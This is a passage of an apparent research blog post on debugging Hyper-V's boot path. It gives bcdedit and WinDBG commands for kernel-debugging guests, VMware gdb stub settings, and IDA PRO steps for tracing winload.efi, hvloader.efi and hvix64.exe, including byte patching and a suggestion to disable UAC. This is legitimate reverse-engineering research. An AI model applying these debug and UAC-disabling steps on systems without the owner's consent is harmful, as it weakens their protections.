<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">powershell \\dbg\privates\kdnetdebugvm.ps1 -vmguid DAAC9DEB-7D43-4AD3-932A-6C186</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">9EE98E4 -port 50020</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then make sure to SHUTDOWN (not restart) the VM so that the new settings will</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">take effect. Run shutdown -s -t 0 from this command prompt.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">To debug this vm, run the following command on your debugger host machine.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">windbg -k net:port=50020,key=3d1uhidq70zko.3uge1t58fhyaa.2ybt7ue2dbmou.1ehlagdp5</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2dvg,target=SRV2016</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="206" src="https://lh5.googleusercontent.com/w3Ky0OeFKWTvXdfFAWLjIejhpdNusUB7DbNxMDB_N-YG7b1oyNceuSXRGSVMdacxv14QrAFQyhH-Hl93SF3B2_bTPC80oKKlHLsFsraDhgpN02EFEu8-RbPx1pQhrAo4RO9T81Epe_LYG82z" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="444" /></span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">It mentions a private kdnetdebugvm.ps1 script, which is not present in the debugger tools. KDNET.exe reads the vmguid from the HKLM\Software\Microsoft\Virtual Machine\Guest\Parameters\VirtualMachineId key and the debugging key from HKLM\BCD00000000\Objects\{4636856e-540f-4170-a130-a84776f4c654}\Elements\1200001d\Element.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Debugging a guest OS running on Hyper-V can be done either by the standard method via a virtual COM port or by using the debugging capabilities of the hypervisor. An example of the second variant was mentioned on OSR Online (5); this is how you can set it up:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">- copy the file kdvm.dll from the Windows 8 directory C:\Windows\system32\kdvm.dll; the same goes for Windows 7 (of course, the file must be the one for a 64-bit operating system). For Windows 8.1 \ Windows Server 2012 R2 kdvm.dll must be taken from a preview build, since the file has been removed from the RTM versions. It looks like you cannot use that method on Windows Server 2016 \ Windows 10: winload ignores the “dbgtransport” parameter with kdvm.dll and loads kd.dll. So yes, use standard COM debugging there!</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"></span><br /></div>
<br /><div dir="ltr" style="margin-left: -5.75pt;">
<table style="border-collapse: collapse; border-image: none; border: currentColor;"><colgroup><col width="335"></col><col width="335"></col></colgroup><tbody>
<tr style="height: 0px;"><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">winload.exe Windows 8.1 x86</span></div>
</td><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">winload.exe Windows 10 x86 (kdvm.dll is absent)</span></div>
</td></tr>
<tr style="height: 0px;"><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="290" src="https://lh6.googleusercontent.com/Sbf4porlLQSHA33FX28GtExeapeclz-3Y2T8L9QhX2wYqUwfzwT5LZ4wx0xGkvi_l1Yv5YmLjcks8x6q_iiz8POvuKLY8Xe25nf6baX44Hiq3r7OvOvfJrmkIn6Zipbsacxtm5V4qRf1K0jC" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="210" /></span></div>
</td><td style="border: 1px solid rgb(0, 0, 0); padding: 0px 8px; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="311" src="https://lh3.googleusercontent.com/BI8vtzReEJDMmLASqaie9wH9HNGbIzd2P7iVCbAcyxlBHZFNQP32v5B1vFWIDJDVIN--udKR-hui0dj9w96V5jTSeRy7eBKmt4YrNJLphDRql78uaM2oX1uRyg7Vefos_mwUw6Fe16iOLat4" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="322" /></span></div>
</td></tr>
</tbody></table>
</div>
<br /><ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">in Windows 8.1 run the following commands:</span></div>
</li>
</ul>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bcdedit /set dbgtransport kdvm.dll</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /set {default} loadoptions host_ip="1.2.3.4",host_port=50011,encryption_key="1.2.3.4"</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /set debug on</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<br /></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">restart the OS.</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">specify the parameters of the script hyperv-dbg.ps1 (the script in the archive has been adapted for Windows Server 2012 R2)</span></div>
</li>
</ul>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="116" src="https://lh4.googleusercontent.com/WFrcS3nNMSr--iOYemRia5HaaRRUizBR10j8P2YbLuWz4pWUqJb0IkIeXsURs10azTHYguWbdABHVmqTThTi9QfzMbFL5TfTKe1qF0d2VaxF0RvAIb09VbpMQgnCfR_GSrsf80SSsKlbXMzk" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="390" /></span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">run the script hyperv-dbg.ps1 in the root partition (run it via „Run as Administrator“, or disable UAC: run gpedit.msc and set Computer Configuration \ Windows Settings \ Security Settings \ Local Policies \ Security Options \ User Account Control: Run all administrators in Admin Approval Mode to Disabled)</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">start WinDBG: </span></div>
</li>
</ul>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.35pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WinDBG -k net:port=50011,target=127.0.0.1,key=1.2.3.4</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "noto symbol"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">−</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> execute the command </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">break</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">; the debugger will then stop inside the guest OS:</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="126" src="https://lh3.googleusercontent.com/DObjgwRm58YEUA_FbNs7T5UimUG0NLjT51jU4L69Qw8Ii5Hi2ZhjzDIZLkbPk85bfYIp0GbIl3OkR5r9qAt7BPcMQbn3tmrM5Y2FjrzZ16jM4mOVlYC-N9mzc2olVQ34bxuiexOOI_1ZCtEw" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="335" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The gdb debugger stub must also be enabled for the VMware virtual machine on which Windows Server 2016 TP2 is installed. To do this, add the following lines to the machine's .vmx file:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">debugStub.listen.guest64 = "TRUE"</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">debugStub.hideBreakpoints = "TRUE"</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">3. Loading the hypervisor</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The research used hvloader.efi (10.0.10011.0) and hvix64.exe (10.0.10074.0). Before debugging, load winload.exe into IDA PRO, choose Debugger -> Select Debugger -> GDB and, in </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Process Options</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, specify the </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Host name</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 127.0.0.1 and port 8864.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="188" src="https://lh3.googleusercontent.com/Fz4DDQKPQnuk7OjvQPAvI4K8Qp0rQX3eSNA2f8ebdx_r7a1wuZt8jpRqmxAmmqh8Cqj8PgrBtpmmh-ac72ysWerbCLvF8mnHz7DM2tKjYpz2CBBrCoaqRt7_X09DKSz2soNP7BGwQ9Mq8OSv" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="425" /></span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Thanks to the previously set boot loader option </span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bootdebug on</span><span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, an early connection to winload.efi (the module that performs the hypervisor launch) is possible. After the OS starts, you need to:</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> run WinDBG:</span></div>
</li>
</ul>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 74.7pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WinDBG.exe -b -k net:port=50002,key=pv1l8rzwhxhz.2vpkq86oc8zwg.tly17iosgzm8.1h7r18svpji4p</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The debugger should break inside the function winload!DebugService2.</span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: -42px; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">find the load address of winload.efi:</span></div>
</li>
</ul>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 53.3pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> lm</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 53.3pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">start end module name</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 53.3pt; margin-top: 0pt; text-align: justify; text-indent: 17.85pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`00939000 00000000`00aae000 winload (pdb symbols)</span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">run IDA PRO, load the previously analyzed module winload.efi, choose Debugger -> Attach to process -> Attach to process started on target and, once execution stops, run Edit -> Segments -> Rebase program, enter the load address of winload.efi (0x00939000) as the Image base and save the database in IDA PRO. ASLR is not applied when winload.exe is loaded, so the load address does not change when the operating system is restarted, and the next time winload.efi is loaded into IDA PRO it will already be placed at the correct address.</span></div>
</li>
</ul>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; margin-left: -42px; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">set a breakpoint in IDA PRO on winload!OslArchHypervisorSetup and continue debugging (F9). Also continue execution in WinDBG:</span></div>
</li>
</ul>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> g</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Winload checks whether the boot loader parameter hypervisorlaunchtype (0x250000f0) is set.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="277" src="https://lh3.googleusercontent.com/eg2mpgwdbTPSom9kYq28RURrlJKxKyAzp_eeZ_FU-nL_LpAfTI9XRaYVVDTIxOsP2QsGhUBNT3JX_xbHafAXx_GHPpcZjUrXkxGDr-ARR_6aipJbUVEY30SLTkFdAUEp4bmWUdu0KYthrNVx" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="441" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If the parameter is present and its value is 1 (Auto), the call chain HvlpLaunchHvLoader -> BlImgStartBootApplication -> ImgArchEfiStartBootApplication loads the module hvloader.efi and passes control to it; hvloader.efi in turn has to load the hypervisor file hvix64.exe and prepare it for execution.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="72" src="https://lh4.googleusercontent.com/J-3ObIod0Dwi979_BV-a3qOc-_jsT8to_88u0N1aQkj_vJwzHh7YMphDvDg4jlvDONF2ok8pQOQj50PO6V6Y7WYNvSoiZKU0tciwhJjzqLoE9vBYkynt_6BkMPBhp-Qfju_0huRJMp-5Nmll" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="443" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The function BlBdStop disconnects WinDBG, but we are debugging through the gdb stub in VMware, and that cannot be switched off this way.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The function Archpx64TransferTo64BitApplicationAsm is used to pass control to HvlMain in hvloader.efi (the address of HvlMain is stored in ArchpChildAppEntryRoutine).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="334" src="https://lh5.googleusercontent.com/NffJooeshemAiIPVg9qdnEhpvF2gqUZfxgHW97A_AKJ0capZ6S7ts61rtXr6AdpyXhnvQMxT2ENzGeko86zFHha60eXn4zK6Xf6Lhg5-npOLtwxZsZk5PUtPgVAVSscj8L1r749eQDVaspC4" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="402" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">To debug hvloader.efi properly, you need to replace the first instruction of HvlMain with EB FE 90 (jmp $ followed by nop). This parks execution in an infinite loop at the entry point, which gives you the opportunity to restart IDA PRO, load hvloader.efi and reconnect the gdb debugger to VMware. After that you must put the original bytes back and rebase the module. To speed these operations up, the changes can be applied with simple Python scripts (PatchHvLoader.py and RestoreHvLoader.py). The load base of hvloader.efi does not change and has always been 0x4BA000, so, as with winload.efi, the rebase has to be performed only once; on subsequent debugger connections the module is already located at the right address without any additional steps.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In hvloader.efi, pay attention to the function BtPrepareHypervisorLaunch (called from HvlMain -> HvlpPrepareHypervisorForLaunch), which performs the basic operations of loading the hypervisor. Shortly before this function is called you can see the call to BtLoadUpdateDll, which loads the processor microcode update library mcupdate_GenuineIntel.dll. Both BtLoadUpdateDll and BtPrepareHypervisorLaunch first call BtpIdentifyPlatform, which determines the processor vendor</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="361" src="https://lh3.googleusercontent.com/L9wn9ExJUWHprgTE2rmnR9_GHmqN8D0zb12F4CudX504byZxUb99kwQXVBq9yxgHFrEJ7KoiXa0qinHJ7ECZfjyMAQArMBdl0uX4XMcJjI01qRhid-B5IKGF4acT5sMlJIWgG3V4wikyFeM7" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="439" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">and returns a pointer to the BtpPlatformTable structure together with the names of the files to be loaded.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: "calibri"; font-size: 12px; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="83" src="https://lh5.googleusercontent.com/x-YLtQ9umh-H5LBhSB4KSco4jAn6JuvdU_DhNdbpHHee3RotnuDsFXDWU8p4uIkY_ihS9jI6FYrpwGSR5e58GgTQMRjfdVAnbu32Pfa5A6qRH7yjOFzNRrUbYyIyyZKAuX2OwcjI97WN2mlo" style="-webkit-transform: rotate(0.00rad); border-image: none; border: currentColor; transform: rotate(0rad);" width="396" /></span></div>
